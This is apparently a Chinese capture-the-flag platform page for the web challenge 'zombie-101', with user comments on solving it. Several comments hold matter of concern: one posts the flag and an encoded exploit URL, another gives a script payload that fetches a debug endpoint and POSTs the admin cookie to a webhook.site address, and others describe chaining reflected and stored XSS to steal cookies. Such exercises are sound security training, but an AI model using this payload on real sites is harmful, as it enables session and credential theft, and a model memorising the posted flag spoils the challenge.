zombie-101WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 73
提  示:
描  述:
wctf{}
评论
1512624649 13天前

flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261} http://82.157.146.43:14179/visit?url=http%3A%2F%2F82.157.146.43%3A14179%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527%252Fdebug%2527%2529.then%252

回复 0

15614005380 2月前

典型的xss盗管理员cookie,网上随便找一个xss平台,或者自己用服务器建一个

回复 0

meilanzhuju 2月前

有点晕乎

回复 0

qingfeng1115 4月前

<script>fetch('/debug').then(r=>r.json()).then(j=>fetch('https://webhook.site/8ab574ff-b363-48a3-a1b3-4455a3001925',{method:'POST',body:j.cookie}))</script> 中https://webhook.site/8a

回复 0

yituoshi 5月前

Half the truth is often a big lie: "flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08

回复 0

justsosoloveyou 6月前

第一个框反射xss,第二个框存储xss。将第一个框触发xss的url输入到第二个框,后台自动访问url后即可触发xss盗取cookie里的flag。注意需要将js编码。

回复 3
lltong 1月前

将js编码,是怎么编码呢

回复 0

WriteUp

image
a2cai

3 金币

评分(0)

暂无评分

解题动态

ysmrhck 攻破了该题 1天前
wangwangP2024 攻破了该题 15天前
ts4win 攻破了该题 21天前
LiHao1 攻破了该题 28天前
HEJIAN 攻破了该题 1月前
thy6666 攻破了该题 1月前
小何lv 攻破了该题 1月前
八戒又犯傻了 攻破了该题 1月前
asir 攻破了该题 1月前
desireart 攻破了该题 1月前
18092952956 攻破了该题 1月前
huangxian 攻破了该题 1月前
yishiyuntuan 攻破了该题 1月前
uy0922 攻破了该题 1月前
yujiaxin 攻破了该题 1月前
QingZ 攻破了该题 1月前
在浅水中溺水么? 攻破了该题 2月前
o3rr0rxiaoming 攻破了该题 2月前
ppppp 攻破了该题 2月前
dongzx 攻破了该题 2月前